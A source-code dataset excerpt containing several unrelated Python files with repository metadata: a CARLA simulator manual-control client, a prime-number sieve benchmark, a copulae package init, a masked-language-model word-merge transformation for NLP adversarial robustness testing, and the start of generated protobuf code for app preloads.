self._control.speed = .01
self._rotation.yaw -= 0.08 * milliseconds
if keys[K_RIGHT] or keys[K_d]:
self._control.speed = .01
self._rotation.yaw += 0.08 * milliseconds
if keys[K_UP] or keys[K_w]:
self._control.speed = 3.333 if pygame.key.get_mods() & KMOD_SHIFT else 2.778
self._control.jump = keys[K_SPACE]
self._rotation.yaw = round(self._rotation.yaw, 1)
self._control.direction = self._rotation.get_forward_vector()
@staticmethod
def _is_quit_shortcut(key):
return (key == K_ESCAPE) or (key == K_q and pygame.key.get_mods() & KMOD_CTRL)
# ==============================================================================
# -- HUD -----------------------------------------------------------------------
# ==============================================================================
class HUD(object):
def __init__(self, width, height):
self.dim = (width, height)
font = pygame.font.Font(pygame.font.get_default_font(), 20)
fonts = [x for x in pygame.font.get_fonts() if 'mono' in x]
default_font = 'ubuntumono'
mono = default_font if default_font in fonts else fonts[0]
mono = pygame.font.match_font(mono)
self._font_mono = pygame.font.Font(mono, 14)
self._notifications = FadingText(font, (width, 40), (0, height - 40))
self.help = HelpText(pygame.font.Font(mono, 24), width, height)
self.server_fps = 0
self.frame = 0
self.simulation_time = 0
self.original_vehicle_control = None
self.restricted_vehicle_control = None
self._show_info = True
self._info_text = []
self._server_clock = pygame.time.Clock()
def on_world_tick(self, timestamp):
self._server_clock.tick()
self.server_fps = self._server_clock.get_fps()
self.frame = timestamp.frame
self.simulation_time = timestamp.elapsed_seconds
def tick(self, world, clock):
self._notifications.tick(world, clock)
if not self._show_info:
return
t = world.player.get_transform()
v = world.player.get_velocity()
c = world.player.get_control()
heading = 'N' if abs(t.rotation.yaw) < 89.5 else ''
heading += 'S' if abs(t.rotation.yaw) > 90.5 else ''
heading += 'E' if 179.5 > t.rotation.yaw > 0.5 else ''
heading += 'W' if -0.5 > t.rotation.yaw > -179.5 else ''
colhist = world.collision_sensor.get_collision_history()
collision = [colhist[x + self.frame - 200] for x in range(0, 200)]
max_col = max(1.0, max(collision))
collision = [x / max_col for x in collision]
vehicles = world.world.get_actors().filter('vehicle.*')
self._info_text = [
'Server: % 16.0f FPS' % self.server_fps,
'Client: % 16.0f FPS' % clock.get_fps(),
'',
'Vehicle: % 20s' % get_actor_display_name(world.player, truncate=20),
'Map: % 20s' % world.map.name,
'Simulation time: % 12s' % datetime.timedelta(seconds=int(self.simulation_time)),
'',
'Speed: % 15.0f km/h' % (3.6 * math.sqrt(v.x**2 + v.y**2 + v.z**2)),
u'Heading:% 16.0f\N{DEGREE SIGN} % 2s' % (t.rotation.yaw, heading),
'Location:% 20s' % ('(% 5.1f, % 5.1f)' % (t.location.x, t.location.y)),
'GNSS:% 24s' % ('(% 2.6f, % 3.6f)' % (world.gnss_sensor.lat, world.gnss_sensor.lon)),
'Height: % 18.0f m' % t.location.z,
'']
if isinstance(c, carla.VehicleControl):
if isinstance(self.original_vehicle_control, carla.VehicleControl):
orig_control = self.original_vehicle_control
restricted_control = self.restricted_vehicle_control
self._info_text += [
('Throttle:', orig_control.throttle, 0.0, 1.0, restricted_control.throttle),
('Steer:', orig_control.steer, -1.0, 1.0, restricted_control.steer),
('Brake:', orig_control.brake, 0.0, 1.0, restricted_control.brake)]
else:
self._info_text += [
('Throttle:', c.throttle, 0.0, 1.0),
('Steer:', c.steer, -1.0, 1.0),
('Brake:', c.brake, 0.0, 1.0)]
self._info_text += [
('Reverse:', c.reverse),
('Hand brake:', c.hand_brake),
('Manual:', c.manual_gear_shift),
'Gear: %s' % {-1: 'R', 0: 'N'}.get(c.gear, c.gear)]
elif isinstance(c, carla.WalkerControl):
self._info_text += [
('Speed:', c.speed, 0.0, 5.556),
('Jump:', c.jump)]
self._info_text += [
'',
'Collision:',
collision,
'',
'Number of vehicles: % 8d' % len(vehicles)]
if len(vehicles) > 1:
self._info_text += ['Nearby vehicles:']
distance = lambda l: math.sqrt((l.x - t.location.x)**2 + (l.y - t.location.y)**2 + (l.z - t.location.z)**2)
vehicles = [(distance(x.get_location()), x) for x in vehicles if x.id != world.player.id]
for d, vehicle in sorted(vehicles):
if d > 200.0:
break
vehicle_type = get_actor_display_name(vehicle, truncate=22)
self._info_text.append('% 4dm %s' % (d, vehicle_type))
def toggle_info(self):
self._show_info = not self._show_info
def notification(self, text, seconds=2.0):
self._notifications.set_text(text, seconds=seconds)
def error(self, text):
self._notifications.set_text('Error: %s' % text, (255, 0, 0))
def render(self, display):
if self._show_info:
info_surface = pygame.Surface((220, self.dim[1]))
info_surface.set_alpha(100)
display.blit(info_surface, (0, 0))
v_offset = 4
bar_h_offset = 100
bar_width = 106
for item in self._info_text:
text_color = (255, 255, 255)
if v_offset + 18 > self.dim[1]:
break
if isinstance(item, list):
if len(item) > 1:
points = [(x + 8, v_offset + 8 + (1.0 - y) * 30) for x, y in enumerate(item)]
pygame.draw.lines(display, (255, 136, 0), False, points, 2)
item = None
v_offset += 18
elif isinstance(item, tuple):
if isinstance(item[1], bool):
rect = pygame.Rect((bar_h_offset, v_offset + 8), (6, 6))
pygame.draw.rect(display, (255, 255, 255), rect, 0 if item[1] else 1)
else:
rect_border = pygame.Rect((bar_h_offset, v_offset + 8), (bar_width, 6))
pygame.draw.rect(display, (255, 255, 255), rect_border, 1)
f = (item[1] - item[2]) / (item[3] - item[2])
if item[2] < 0.0:
rect = pygame.Rect((bar_h_offset + f * (bar_width - 6), v_offset + 8), (6, 6))
else:
rect = pygame.Rect((bar_h_offset, v_offset + 8), (f * bar_width, 6))
pygame.draw.rect(display, (255, 255, 255), rect)
if len(item) == 5:
if item[1] != item[4]:
pygame.draw.rect(display, (255, 0, 0), rect_border, 1)
f = (item[4] - item[2]) / (item[3] - item[2])
if item[2] < 0.0:
rect = pygame.Rect((bar_h_offset + f * (bar_width - 6), v_offset + 8), (6, 6))
else:
rect = pygame.Rect((bar_h_offset, v_offset + 8), (f * bar_width, 6))
pygame.draw.rect(display, (255, 0, 0), rect)
text_color = (255, 0, 0)
item = item[0]
if item: # At this point has to be a str.
surface = self._font_mono.render(item, True, text_color)
display.blit(surface, (8, v_offset))
v_offset += 18
self._notifications.render(display)
self.help.render(display)
# ==============================================================================
# -- FadingText ----------------------------------------------------------------
# ==============================================================================
class FadingText(object):
def __init__(self, font, dim, pos):
self.font = font
self.dim = dim
self.pos = pos
self.seconds_left = 0
self.surface = pygame.Surface(self.dim)
def set_text(self, text, color=(255, 255, 255), seconds=2.0):
text_texture = self.font.render(text, True, color)
self.surface = pygame.Surface(self.dim)
self.seconds_left = seconds
self.surface.fill((0, 0, 0, 0))
self.surface.blit(text_texture, (10, 11))
def tick(self, _, clock):
delta_seconds = 1e-3 * clock.get_time()
self.seconds_left = max(0.0, self.seconds_left - delta_seconds)
self.surface.set_alpha(500.0 * self.seconds_left)
def render(self, display):
display.blit(self.surface, self.pos)
# ==============================================================================
# -- HelpText ------------------------------------------------------------------
# ==============================================================================
class HelpText(object):
def __init__(self, font, width, height):
lines = __doc__.split('\n')
self.font = font
self.dim = (680, len(lines) * 22 + 12)
self.pos = (0.5 * width - 0.5 * self.dim[0], 0.5 * height - 0.5 * self.dim[1])
self.seconds_left = 0
self.surface = pygame.Surface(self.dim)
self.surface.fill((0, 0, 0, 0))
for n, line in enumerate(lines):
text_texture = self.font.render(line, True, (255, 255, 255))
self.surface.blit(text_texture, (22, n * 22))
self._render = False
self.surface.set_alpha(220)
def toggle(self):
self._render = not self._render
def render(self, display):
if self._render:
display.blit(self.surface, self.pos)
# ==============================================================================
# -- CollisionSensor -----------------------------------------------------------
# ==============================================================================
class CollisionSensor(object):
def __init__(self, parent_actor, hud):
self.sensor = None
self.history = []
self._parent = parent_actor
self.hud = hud
world = self._parent.get_world()
bp = world.get_blueprint_library().find('sensor.other.collision')
self.sensor = world.spawn_actor(bp, carla.Transform(), attach_to=self._parent)
# We need to pass the lambda a weak reference to self to avoid circular
# reference.
weak_self = weakref.ref(self)
self.sensor.listen(lambda event: CollisionSensor._on_collision(weak_self, event))
def get_collision_history(self):
history = collections.defaultdict(int)
for frame, intensity in self.history:
history[frame] += intensity
return history
@staticmethod
def _on_collision(weak_self, event):
self = weak_self()
if not self:
return
actor_type = get_actor_display_name(event.other_actor)
self.hud.notification('Collision with %r' % actor_type)
impulse = event.normal_impulse
intensity = math.sqrt(impulse.x**2 + impulse.y**2 + impulse.z**2)
self.history.append((event.frame, intensity))
if len(self.history) > 4000:
self.history.pop(0)
# ==============================================================================
# -- LaneInvasionSensor --------------------------------------------------------
# ==============================================================================
class LaneInvasionSensor(object):
def __init__(self, parent_actor, hud):
self.sensor = None
self._parent = parent_actor
self.hud = hud
world = self._parent.get_world()
bp = world.get_blueprint_library().find('sensor.other.lane_invasion')
self.sensor = world.spawn_actor(bp, carla.Transform(), attach_to=self._parent)
# We need to pass the lambda a weak reference to self to avoid circular
# reference.
weak_self = weakref.ref(self)
self.sensor.listen(lambda event: LaneInvasionSensor._on_invasion(weak_self, event))
@staticmethod
def _on_invasion(weak_self, event):
self = weak_self()
if not self:
return
lane_types = set(x.type for x in event.crossed_lane_markings)
text = ['%r' % str(x).split()[-1] for x in lane_types]
self.hud.notification('Crossed line %s' % ' and '.join(text))
# ==============================================================================
# -- GnssSensor --------------------------------------------------------
# ==============================================================================
class GnssSensor(object):
def __init__(self, parent_actor):
self.sensor = None
self._parent = parent_actor
self.lat = 0.0
self.lon = 0.0
world = self._parent.get_world()
bp = world.get_blueprint_library().find('sensor.other.gnss')
self.sensor = world.spawn_actor(bp, carla.Transform(carla.Location(x=1.0, z=2.8)), attach_to=self._parent)
# We need to pass the lambda a weak reference to self to avoid circular
# reference.
weak_self = weakref.ref(self)
self.sensor.listen(lambda event: GnssSensor._on_gnss_event(weak_self, event))
@staticmethod
def _on_gnss_event(weak_self, event):
self = weak_self()
if not self:
return
self.lat = event.latitude
self.lon = event.longitude
# ==============================================================================
# -- RssSensor --------------------------------------------------------
# ==============================================================================
class RssSensor(object):
def __init__(self, parent_actor):
self.sensor = None
self._parent = parent_actor
self.timestamp = None
self.response_valid = False
self.lon_response = None
self.lat_response_right = None
self.lat_response_left = None
self.acceleration_restriction = None
self.ego_velocity = None
world = self._parent.get_world()
bp = world.get_blueprint_library().find('sensor.other.rss')
self.sensor = world.spawn_actor(bp, carla.Transform(carla.Location(x=0.0, z=0.0)), attach_to=self._parent)
# We need to pass the lambda a weak reference to self to avoid circular
# reference.
def check_rss_class(clazz):
return inspect.isclass(clazz) and "RssSensor" in clazz.__name__
if not inspect.getmembers(carla, check_rss_class):
raise RuntimeError('CARLA PythonAPI not compiled in RSS variant, please "make PythonAPI.rss"')
weak_self = weakref.ref(self)
self.sensor.visualize_results = True
self.sensor.listen(lambda event: RssSensor._on_rss_response(weak_self, event))
@staticmethod
def _on_rss_response(weak_self, response):
self = weak_self()
if not self or not response:
return
self.timestamp = response.timestamp
self.response_valid = response.response_valid
self.lon_response = response.longitudinal_response
self.lat_response_right = response.lateral_response_right
self.lat_response_left = response.lateral_response_left
self.acceleration_restriction = response.acceleration_restriction
self.ego_velocity = response.ego_velocity
# ==============================================================================
# -- CameraManager -------------------------------------------------------------
# ==============================================================================
class CameraManager(object):
def __init__(self, parent_actor, hud):
self.sensor = None
self.surface = None
self._parent = parent_actor
self.hud = hud
self.recording = False
bound_y = 0.5 + self._parent.bounding_box.extent.y
Attachment = carla.AttachmentType
self._camera_transforms = [
(carla.Transform(carla.Location(x=-5.5, z=2.5), carla.Rotation(pitch=8.0)), Attachment.SpringArm),
(carla.Transform(carla.Location(x=1.6, z=1.7)), Attachment.Rigid),
(carla.Transform(carla.Location(x=5.5, y=1.5, z=1.5)), Attachment.SpringArm),
(carla.Transform(carla.Location(x=-8.0, z=6.0), carla.Rotation(pitch=6.0)), Attachment.SpringArm),
(carla.Transform(carla.Location(x=-1, y=-bound_y, z=0.5)), Attachment.Rigid)]
self.transform_index = 1
self.sensors = [
['sensor.camera.rgb', cc.Raw, 'Camera RGB'],
['sensor.camera.depth', cc.Raw, 'Camera Depth (Raw)'],
['sensor.camera.depth', cc.Depth, 'Camera Depth (Gray Scale)'],
['sensor.camera.depth', cc.LogarithmicDepth, 'Camera Depth (Logarithmic Gray Scale)'],
['sensor.camera.semantic_segmentation', cc.Raw, 'Camera Semantic Segmentation (Raw)'],
['sensor.camera.semantic_segmentation', cc.CityScapesPalette,
'Camera Semantic Segmentation (CityScapes Palette)'],
['sensor.lidar.ray_cast', None, 'Lidar (Ray-Cast)']]
world = self._parent.get_world()
bp_library = world.get_blueprint_library()
for item in self.sensors:
bp = bp_library.find(item[0])
if item[0].startswith('sensor.camera'):
bp.set_attribute('image_size_x', str(hud.dim[0]))
bp.set_attribute('image_size_y', str(hud.dim[1]))
elif item[0].startswith('sensor.lidar'):
bp.set_attribute('range', '5000')
item.append(bp)
self.index = None
def toggle_camera(self):
self.transform_index = (self.transform_index + 1) % len(self._camera_transforms)
self.set_sensor(self.index, notify=False, force_respawn=True)
def set_sensor(self, index, notify=True, force_respawn=False):
index = index % len(self.sensors)
needs_respawn = True if self.index is None else \
(force_respawn or (self.sensors[index][0] != self.sensors[self.index][0]))
if needs_respawn:
if self.sensor is not None:
self.sensor.destroy()
self.surface = None
self.sensor = self._parent.get_world().spawn_actor(
self.sensors[index][-1],
self._camera_transforms[self.transform_index][0],
attach_to=self._parent,
attachment_type=self._camera_transforms[self.transform_index][1])
# We need to pass the lambda a weak reference to self to avoid
# circular reference.
weak_self = weakref.ref(self)
self.sensor.listen(lambda image: CameraManager._parse_image(weak_self, image))
if notify:
self.hud.notification(self.sensors[index][2])
self.index = index
def next_sensor(self):
self.set_sensor(self.index + 1)
def toggle_recording(self):
self.recording = not self.recording
self.hud.notification('Recording %s' % ('On' if self.recording else 'Off'))
def render(self, display):
if self.surface is not None:
display.blit(self.surface, (0, 0))
@staticmethod
def _parse_image(weak_self, image):
self = weak_self()
if not self:
return
if self.sensors[self.index][0].startswith('sensor.lidar'):
points = np.frombuffer(image.raw_data, dtype=np.dtype('f4'))
points = np.reshape(points, (int(points.shape[0] / 3), 3))
lidar_data = np.array(points[:, :2])
lidar_data *= min(self.hud.dim) / 100.0
lidar_data += (0.5 * self.hud.dim[0], 0.5 * self.hud.dim[1])
lidar_data = np.fabs(lidar_data) # pylint: disable=E1111
lidar_data = lidar_data.astype(np.int32)
lidar_data = np.reshape(lidar_data, (-1, 2))
lidar_img_size = (self.hud.dim[0], self.hud.dim[1], 3)
lidar_img = np.zeros((lidar_img_size), dtype = int)
lidar_img[tuple(lidar_data.T)] = (255, 255, 255)
self.surface = pygame.surfarray.make_surface(lidar_img)
else:
image.convert(self.sensors[self.index][1])
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self.surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))
if self.recording:
image.save_to_disk('_out/%08d' % image.frame)
# ==============================================================================
# -- game_loop() ---------------------------------------------------------------
# ==============================================================================
def game_loop(args):
pygame.init()
pygame.font.init()
world = None
try:
client = carla.Client(args.host, args.port)
client.set_timeout(2.0)
display = pygame.display.set_mode(
(args.width, args.height),
pygame.HWSURFACE | pygame.DOUBLEBUF)
hud = HUD(args.width, args.height)
world = World(client.get_world(), hud, args.filter, args.rolename)
controller = KeyboardControl(world, args)
clock = pygame.time.Clock()
while True:
clock.tick_busy_loop(60)
if controller.parse_events(client, world, clock):
return
world.tick(clock)
world.render(display)
pygame.display.flip()
finally:
if (world and world.recording_enabled):
client.stop_recorder()
if world is not None:
world.destroy()
pygame.quit()
# ==============================================================================
# -- main() --------------------------------------------------------------------
# ==============================================================================
def main():
argparser = argparse.ArgumentParser(
description='CARLA Manual Control Client RSS')
argparser.add_argument(
'-v', '--verbose',
action='store_true',
dest='debug',
help='print debug information')
argparser.add_argument(
'--host',
metavar='H',
default='127.0.0.1',
help='IP of the host server (default: 127.0.0.1)')
argparser.add_argument(
'-p', '--port',
metavar='P',
default=2000,
type=int,
help='TCP port to listen to (default: 2000)')
argparser.add_argument(
'-a', '--autopilot',
action='store_true',
help='enable autopilot')
argparser.add_argument(
'--res',
metavar='WIDTHxHEIGHT',
default='1280x720',
help='window resolution (default: 1280x720)')
argparser.add_argument(
'--filter',
metavar='PATTERN',
default='vehicle.*',
help='actor filter (default: "vehicle.*")')
argparser.add_argument(
'--rolename',
metavar='NAME',
default='hero',
help='actor role name (default: "hero")')
args = argparser.parse_args()
args.width, args.height = [int(x) for x in args.res.split('x')]
log_level = logging.DEBUG if args.debug else logging.INFO
logging.basicConfig(format='%(levelname)s: %(message)s', level=log_level)
logging.info('listening to server %s:%s', args.host, args.port)
print(__doc__)
try:
game_loop(args)
except KeyboardInterrupt:
print('\nCancelled by user. Bye!')
if __name__ == '__main__':
main()
| 43.065911 | 163 | 0.542889 |
4996974e2242e4f9fa2bfeeabce967cc8eb8af94 | 645 | py | Python | python/prime.py | futursolo/Swift-Speed-Test | f64999ae3cc4c13eca50fb2e425bb582c82f2afb | [
"MIT"
] | 4 | 2015-06-22T16:15:14.000Z | 2016-02-02T06:27:01.000Z | python/prime.py | futursolo/Swift-Speed-Test | f64999ae3cc4c13eca50fb2e425bb582c82f2afb | [
"MIT"
] | null | null | null | python/prime.py | futursolo/Swift-Speed-Test | f64999ae3cc4c13eca50fb2e425bb582c82f2afb | [
"MIT"
] | null | null | null | from __future__ import print_function
import math
import time
max_num = 1000000
start_time = time.time()
print("Python Prime Number Calculator, max_num = %d." % max_num)
num_list = []
max_value = 0
for i in range(0, max_num):
num_list.append(1)
for i in range(2, int(math.sqrt(max_num)) + 1):
if num_list[i] != 0:
current = i * 2
while current < max_num:
num_list[current] = 0
current += i
for i in range(0, max_num):
if num_list[i] != 0:
max_value = i
finish_time = time.time()
print("Finished! Max Value is %d, Used Time is %.5f" % (max_value, (finish_time - start_time)))
| 20.15625 | 95 | 0.629457 |
deb2cb5a67fb374ff99c3004a5eed4924c44bbda | 87 | py | Python | copulae/mixtures/gmc/__init__.py | CrisDS81/copulae | 2a312c2b849f95cfb2b40b381d34bc790d9d80c5 | [
"MIT"
] | 100 | 2019-01-30T19:52:04.000Z | 2022-03-18T10:00:17.000Z | copulae/mixtures/gmc/__init__.py | CrisDS81/copulae | 2a312c2b849f95cfb2b40b381d34bc790d9d80c5 | [
"MIT"
] | 30 | 2019-07-14T00:30:03.000Z | 2021-08-24T08:59:14.000Z | copulae/mixtures/gmc/__init__.py | CrisDS81/copulae | 2a312c2b849f95cfb2b40b381d34bc790d9d80c5 | [
"MIT"
] | 25 | 2019-03-10T21:12:55.000Z | 2021-11-09T11:54:16.000Z | from .parameter import GMCParam
from .gmc import EstimateMethod, GaussianMixtureCopula
| 29 | 54 | 0.862069 |
2010827477fad00a4a9d8f3841df4d4a236da580 | 11,064 | py | Python | utils/transformations/word_level/word_masked_lm_merge.py | sharinka0715/AISafety | 1e210dd448a01069aeaba9fa637b68505ad43332 | [
"MIT"
] | null | null | null | utils/transformations/word_level/word_masked_lm_merge.py | sharinka0715/AISafety | 1e210dd448a01069aeaba9fa637b68505ad43332 | [
"MIT"
] | null | null | null | utils/transformations/word_level/word_masked_lm_merge.py | sharinka0715/AISafety | 1e210dd448a01069aeaba9fa637b68505ad43332 | [
"MIT"
] | null | null | null | # !/usr/bin/env python
# coding=UTF-8
"""
@Author: WEN Hao
@LastEditors: WEN Hao
@Description:
@Date: 2021-09-08
@LastEditTime: 2021-11-10
Word Merge by BERT-Masked LM.
"""
import os
from typing import Any, List, NoReturn, Sequence, Optional, Union
import torch
from transformers import AutoModelForMaskedLM, AutoTokenizer, BatchEncoding
from ..base import Transformation
from ...strings import ( # noqa: F401
normalize_language,
LANGUAGE,
normalize_pos_tag,
UNIVERSAL_POSTAG,
check_if_subword,
check_if_punctuations,
strip_BPE_artifacts,
isChinese,
)
from ...strings_en import tokenize
from ...misc import nlp_cache_dir, default_device
from ...attacked_text import AttackedText
__all__ = [
"WordMaskedLMMerge",
]
class WordMaskedLMMerge(Transformation):
"""Generate potential merge of adjacent using a masked language model.
Based off of:
CLARE: Contextualized Perturbation for Textual Adversarial Attack" (Li et al, 2020)
https://arxiv.org/abs/2009.07502
"""
__name__ = "WordMaskedLMMerge"
def __init__(
self,
language: str,
masked_lm_or_path: Union[str, AutoModelForMaskedLM] = "bert-base-uncased",
tokenizer: Optional[Any] = None,
max_length: int = 512,
window_size: Union[int, float] = float("inf"),
max_candidates: int = 50,
min_confidence: float = 5e-4,
batch_size: int = 16,
device: Optional[torch.device] = None,
**kwargs: Any,
) -> NoReturn:
"""
Args:
masked_lm_or_path:
Either the name of pretrained masked language model from `transformers` model hub
or the actual model. Default is `bert-base-uncased`.
tokenizer:
The tokenizer of the corresponding model.
If you passed in name of a pretrained model for `masked_language_model`,
you can skip this argument as the correct tokenizer can be infered from the name.
However, if you're passing the actual model, you must provide a tokenizer.
max_length:
The max sequence length the masked language model is designed to work with. Default is 512.
window_size:
The number of surrounding words to include when making top word prediction.
For each position to merge, we take `window_size // 2` words to the left
and `window_size // 2` words to the right and pass the text within the window
to the masked language model. Default is `float("inf")`, which is equivalent to using the whole text.
max_candidates:
Maximum number of candidates to consider as replacements for each word.
Replacements are ranked by model's confidence.
min_confidence:
Minimum confidence threshold each replacement word must pass.
"""
super().__init__()
self._language = normalize_language(language)
self.max_length = max_length
self.window_size = window_size
self.max_candidates = max_candidates
self.min_confidence = min_confidence
self.batch_size = batch_size
if isinstance(masked_lm_or_path, str):
if os.path.exists(masked_lm_or_path):
_load_path = masked_lm_or_path
elif os.path.exists(os.path.join(nlp_cache_dir, masked_lm_or_path)):
_load_path = os.path.join(nlp_cache_dir, masked_lm_or_path)
else:
_load_path = None
# raise ValueError(f"本地模型不存在,暂不支持在线从HuggingFace Hub载入模型{masked_lm_or_path}")
self._language_model = AutoModelForMaskedLM.from_pretrained(
masked_lm_or_path
)
self._lm_tokenizer = AutoTokenizer.from_pretrained(
masked_lm_or_path, use_fast=True
)
if _load_path:
self._language_model = AutoModelForMaskedLM.from_pretrained(_load_path)
self._lm_tokenizer = AutoTokenizer.from_pretrained(
_load_path, use_fast=True
)
else:
self._language_model = masked_lm_or_path
if tokenizer is None:
raise ValueError(
"`tokenizer` argument must be provided when passing an actual model as `masked_language_model`."
)
self._lm_tokenizer = tokenizer
try:
self._language_model.to(default_device)
except Exception:
self._language_model.to(torch.device("cpu"))
self._language_model.eval()
self.masked_lm_name = self._language_model.__class__.__name__
def _encode_text(self, text: str) -> BatchEncoding:
"""Encodes ``text`` using an ``AutoTokenizer``, ``self._lm_tokenizer``.
Returns a ``dict`` where keys are strings (like 'input_ids') and
values are ``torch.Tensor``s. Moves tensors to the same device
as the language model.
"""
encoding = self._lm_tokenizer(
text,
max_length=self.max_length,
truncation=True,
padding="max_length",
return_tensors="pt",
)
return encoding.to(self._language_model.device)
# try:
# return encoding.to(default_device)
# except Exception:
# return encoding.to(torch.device("cpu"))
def _get_candidates(
self, current_text: AttackedText, indices_to_modify: Sequence[int]
) -> List[List[str]]:
"""Get replacement words for the word we want to replace using BAE method.
Args:
current_text: Text we want to get replacements for.
indices_to_modify: indices of words to replace
"""
masked_texts = []
for index in indices_to_modify:
temp_text = current_text.replace_word_at_index(
index, self._lm_tokenizer.mask_token
)
temp_text = temp_text.delete_word_at_index(index + 1)
# Obtain window
temp_text = temp_text.text_window_around_index(index, self.window_size)
masked_texts.append(temp_text)
i = 0
# 2-D list where for each index to modify we have a list of replacement words
replacement_words = []
while i < len(masked_texts):
inputs = self._encode_text(masked_texts[i : i + self.batch_size])
ids = [
inputs["input_ids"][i].tolist() for i in range(len(inputs["input_ids"]))
]
with torch.no_grad():
preds = self._language_model(**inputs)[0]
for j in range(len(ids)):
try:
# Need try-except b/c mask-token located past max_length might be truncated by tokenizer
masked_index = ids[j].index(self._lm_tokenizer.mask_token_id)
except ValueError:
replacement_words.append([])
continue
mask_token_logits = preds[j, masked_index]
mask_token_probs = torch.softmax(mask_token_logits, dim=0)
ranked_indices = torch.argsort(mask_token_probs, descending=True)
top_words = []
for _id in ranked_indices:
_id = _id.item()
word = self._lm_tokenizer.convert_ids_to_tokens(_id)
if check_if_subword(
word,
self._language_model.config.model_type,
(masked_index == 1),
):
word = strip_BPE_artifacts(
word, self._language_model.config.model_type
)
if (
mask_token_probs[_id] >= self.min_confidence
and len(tokenize(word)) == 1
and not check_if_punctuations(word)
):
top_words.append(word)
if (
len(top_words) >= self.max_candidates
or mask_token_probs[_id] < self.min_confidence
):
break
replacement_words.append(top_words)
i += self.batch_size
return replacement_words
def _get_transformations(
self,
current_text: AttackedText,
indices_to_modify: Sequence[int],
max_num: Optional[int] = None,
) -> List[AttackedText]:
""" """
transformed_texts = []
indices_to_modify = list(indices_to_modify)
# find indices that are suitable to merge
token_tags = [
current_text.pos_of_word_index(i) for i in range(current_text.num_words)
]
merge_indices = find_merge_index(token_tags)
merged_words = self._get_candidates(current_text, merge_indices)
transformed_texts = []
for i in range(len(merged_words)):
index_to_modify = merge_indices[i]
word_at_index = current_text.words[index_to_modify]
for word in merged_words[i]:
word = word.strip("Ġ")
if word != word_at_index:
temp_text = current_text.delete_word_at_index(index_to_modify + 1)
transformed_texts.append(
temp_text.replace_word_at_index(index_to_modify, word)
)
return transformed_texts
def extra_repr_keys(self) -> List[str]:
""" """
return ["masked_lm_name", "max_length", "max_candidates", "min_confidence"]
_merge_map = {
UNIVERSAL_POSTAG.NOUN: [
UNIVERSAL_POSTAG.NOUN,
],
UNIVERSAL_POSTAG.ADJ: [
UNIVERSAL_POSTAG.NOUN,
UNIVERSAL_POSTAG.NUM,
UNIVERSAL_POSTAG.ADJ,
UNIVERSAL_POSTAG.ADV,
],
UNIVERSAL_POSTAG.ADV: [
UNIVERSAL_POSTAG.ADJ,
UNIVERSAL_POSTAG.VERB,
],
UNIVERSAL_POSTAG.VERB: [
UNIVERSAL_POSTAG.ADV,
UNIVERSAL_POSTAG.VERB,
UNIVERSAL_POSTAG.NOUN,
UNIVERSAL_POSTAG.ADJ,
],
UNIVERSAL_POSTAG.DET: [
UNIVERSAL_POSTAG.NOUN,
UNIVERSAL_POSTAG.ADJ,
],
UNIVERSAL_POSTAG.PRON: [
UNIVERSAL_POSTAG.NOUN,
UNIVERSAL_POSTAG.ADJ,
],
UNIVERSAL_POSTAG.NUM: [
UNIVERSAL_POSTAG.NUM,
UNIVERSAL_POSTAG.NOUN,
],
}
def find_merge_index(
token_tags: Sequence[Union[str, UNIVERSAL_POSTAG]],
indices: Optional[Sequence[int]] = None,
) -> List[int]:
""" """
merge_indices = []
if indices is None:
indices = range(len(token_tags) - 1)
for i in indices:
cur_tag = normalize_pos_tag(token_tags[i])
next_tag = normalize_pos_tag(token_tags[i + 1])
if cur_tag in _merge_map and next_tag in _merge_map[cur_tag]:
merge_indices.append(i)
return merge_indices
| 36.635762 | 117 | 0.594179 |
f751465d345a5f6160d76c9bcda84e467b54713a | 6,322 | py | Python | finsky/protos/preloads_pb2.py | mmcloughlin/finsky | f21ccdbebf86e55a542c658b6972cb1f3fb5f119 | [
"MIT"
] | 59 | 2015-07-11T18:53:59.000Z | 2021-09-08T03:16:17.000Z | finsky/protos/preloads_pb2.py | mmcloughlin/finsky | f21ccdbebf86e55a542c658b6972cb1f3fb5f119 | [
"MIT"
] | 10 | 2015-07-01T08:09:29.000Z | 2021-12-06T01:23:00.000Z | finsky/protos/preloads_pb2.py | mmcloughlin/finsky | f21ccdbebf86e55a542c658b6972cb1f3fb5f119 | [
"MIT"
] | 14 | 2015-08-15T22:04:02.000Z | 2021-03-03T09:14:39.000Z | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: preloads.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import common_pb2 as common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='preloads.proto',
package='Preloads',
syntax='proto2',
serialized_pb=_b('\n\x0epreloads.proto\x12\x08Preloads\x1a\x0c\x63ommon.proto\"\xa6\x01\n\x07Preload\x12\x1c\n\x05\x64ocid\x18\x01 \x01(\x0b\x32\r.Common.Docid\x12\x13\n\x0bversionCode\x18\x02 \x01(\x05\x12\r\n\x05title\x18\x03 \x01(\t\x12\x1b\n\x04icon\x18\x04 \x01(\x0b\x32\r.Common.Image\x12\x15\n\rdeliveryToken\x18\x05 \x01(\t\x12\x17\n\x0finstallLocation\x18\x06 \x01(\x05\x12\x0c\n\x04size\x18\x07 \x01(\x03\"c\n\x10PreloadsResponse\x12(\n\rconfigPreload\x18\x01 \x01(\x0b\x32\x11.Preloads.Preload\x12%\n\nappPreload\x18\x02 \x03(\x0b\x32\x11.Preloads.PreloadB,\n com.google.android.finsky.protosB\x08Preloads')
,
dependencies=[common__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_PRELOAD = _descriptor.Descriptor(
name='Preload',
full_name='Preloads.Preload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='docid', full_name='Preloads.Preload.docid', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='versionCode', full_name='Preloads.Preload.versionCode', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
